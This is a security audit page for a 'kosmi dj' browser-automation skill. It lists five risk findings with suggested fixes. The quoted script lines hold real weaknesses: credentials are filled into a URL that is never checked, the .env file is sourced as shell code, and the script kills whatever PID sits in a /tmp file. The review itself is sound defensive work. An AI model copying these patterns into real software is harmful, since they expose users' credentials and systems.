kosmi dj
ReviewAudited by ClawScan on May 10, 2026.
Overview
This Kosmi automation is mostly on-purpose, but it needs review because it can use your login/session, execute commands from its .env file, and keep controlling a room in a long-running loop.
Install only if you are comfortable letting an automated browser control your Kosmi room. Use a dedicated Kosmi account if possible, verify the room URL is really on Kosmi before storing credentials, protect the .env file, install a trusted pinned agent-browser version, and manually stop any DJ loop when finished.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If the room URL is mistyped, changed, or malicious, the agent could type the user's Kosmi credentials into the wrong page.
The script opens the user-configured URL and then fills Kosmi email/password fields if it sees matching inputs. The artifacts do not show a host/domain validation step before credentials are entered.
ab open "$KOSMI_ROOM_URL" ... ab fill "$EMAIL_BOX" "$KOSMI_EMAIL" ... ab fill "$PASS_BOX" "$KOSMI_PASSWORD"
Validate that KOSMI_ROOM_URL is on the expected Kosmi domain before filling credentials, prompt before first login, and prefer a dedicated Kosmi account or encrypted persistent session over storing a password.
Commands placed in the .env file would run automatically when the skill is invoked, so a tampered or copied .env could execute local shell commands.
The script sources the .env file as shell code rather than parsing only key/value pairs. The same pattern appears in the other scripts.
if [[ -f "$ENV_FILE" ]]; then set -a source "$ENV_FILE" set +a fi
Use a safe .env parser, keep the file skill-specific, restrict its permissions, and do not paste untrusted content into the .env file.
A stale or tampered PID file could cause the script to stop an unrelated local process when the DJ loop starts.
The loop uses a predictable /tmp PID file and kills whatever PID is stored there without verifying that it belongs to this skill's own loop process.
PID_FILE="/tmp/kosmi-dj-loop.pid" ... OLD_PID="$(cat "$PID_FILE" 2>/dev/null)" || true ... kill "$OLD_PID" 2>/dev/null || true
Store runtime files in a private user-owned directory, use locking, and verify the target process command/session before sending kill signals.
If started, the skill can keep controlling the Kosmi room after the initial request until the user stops it.
The DJ mode is an indefinite loop that keeps selecting and playing videos until interrupted; this is disclosed and central to the auto-DJ purpose.
while true; do # Get next video NEXT_URL="$(next_video)"
Start loop mode only intentionally, monitor the status/PID file, and stop it when the watch party is over.
The external package has substantial browser control, so users must trust the installed agent-browser version.
The skill depends on an external browser-automation CLI installed globally, but no pinned install spec or reviewed dependency version is provided.
`agent-browser` CLI installed and on PATH (`npm install -g agent-browser` or available in the environment)
Install agent-browser only from a trusted source, pin and document the expected version, and declare required binaries such as agent-browser and jq in metadata.